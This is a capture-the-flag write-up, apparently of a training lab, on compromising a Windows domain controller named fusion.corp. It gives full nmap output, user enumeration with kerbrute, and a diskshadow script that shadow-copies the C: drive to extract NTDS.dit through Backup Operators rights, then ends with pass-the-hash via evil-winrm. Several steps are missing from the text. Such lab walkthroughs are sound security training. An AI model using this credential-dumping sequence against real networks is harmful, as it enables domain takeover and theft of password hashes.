Nmap scan report for fusion.corp (10.10.234.3)
Host is up (0.063s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: eBusiness Bootstrap Template
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-04 11:20:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fusion-DC.fusion.corp
| Issuer: commonName=Fusion-DC.fusion.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-03T10:53:31
| Not valid after: 2024-12-03T10:53:31
| MD5: d2aa:3262:517d:2b4e:912f:42ec:612f:4403
|_SHA-1: 40d0:f1db:52b3:186b:2cca:16c8:bba6:9690:2e03:74a9
| rdp-ntlm-info:
| Target_Name: FUSION
| NetBIOS_Domain_Name: FUSION
| NetBIOS_Computer_Name: FUSION-DC
| DNS_Domain_Name: fusion.corp
| DNS_Computer_Name: Fusion-DC.fusion.corp
| Product_Version: 10.0.17763
|_ System_Time: 2024-06-04T11:21:29+00:00
|_ssl-date: 2024-06-04T11:22:08+00:00; -2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-06-04T11:21:32
|_ start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 59.51 ms 10.8.0.1
2 63.12 ms fusion.corp (10.10.234.3)
NSE: Script Post-scanning.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 217.12 seconds
Raw packets sent: 131214 (5.777MB) | Rcvd: 2685 (646.142KB)
Port 80
Running ffuf against the website hosted on port 80 we obtain juicy results:
From this XML we can extract a useful list of usernames:
Jhon Mickel,jmickel
Andrew Arnold,aarnold
Lellien Linda,llinda
Jhon Powel,jpowel
Dominique Vroslav,dvroslav
Thomas Jeffersonn,tjefferson
Nola Maurin,nmaurin
Mira Ladovic,mladovic
Larry Parker,lparker
Kay Garland,kgarland
Diana Pertersen,dpertersen
Port 445 (anonymous enumeration)
Trying to do some enumeration on port 445 we notice that it is not possible to list shares as anonymous/guest users:
Port 88
If we try to validate with Kerberos the previously extracted list of users using kerbrute we will get that only one user out of the 11 obtained is existing at domain: is the lparker user.
Membership in the Backup Operators group provides access to the domain controller file system due to the SeBackup and SeRestore privileges. These privileges enable folder traversal, listing, and file copying capabilities, even without explicit permissions, using the FILE_FLAG_BACKUP_SEMANTICS flag. This means Backup Operators can backup the DC’s hard drive, make a copy of NTDS.dit and the system registry hive from the backup, and then move both files offline and dump hashes.
On Kali machine create a backup.txt file containing these commands:
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backup
From the remote session as jmurphy create a temporary directory C:\Temp, upload the backup.txt to it and run diskshadow.exe in script mode:
Now copy the shadow copies to current directory (C:\Temp):
Awesome! We've obtained another pair credential for the user jmurphy:
Using the Pass-the-Hash attack we can authenticate as Administrator via evil-winrm using the hash in NTHash format and get the third flag by completing the room!
